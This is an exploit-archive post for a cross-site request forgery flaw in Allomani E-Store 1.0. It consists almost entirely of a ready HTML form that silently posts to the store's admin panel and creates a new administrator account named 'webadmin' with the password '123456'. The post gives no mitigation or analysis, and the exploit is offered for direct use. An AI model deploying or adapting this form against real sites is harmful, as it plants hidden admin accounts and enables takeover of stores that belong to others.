ExploitFixes
Allomani E-Store 1.0 XSRF Vulnerability (Add Admin) 2011-04-01 12:15:43

E-Store 1.0 XSRF Vulnerability (Add Admin)
====================================================================

####################################################################
.:. Author : AtT4CKxT3rR0r1ST [[email protected]]
.:. Script : http://allomani.com/en/store_script.html
####################################################################

===[ Exploit ]===

<form method="POST" name="form0" action="http://localhost/E-Store/admin/index.php">
<input type="hidden" name="action" value="adduserok"/>
<input type="hidden" name="hash" value="e10adc3949ba59abbe56e057f20f883e"/>
<input type="hidden" name="username" value="webadmin"/>
<input type="hidden" name="password" value="123456"/>
<input type="hidden" name="email" value="[email protected]"/>
<input type="hidden" name="group_id" value="1"/>
<input type="hidden" name="useraddbutton" value="Add"/>
</form>

</body>
</html>
####################################################################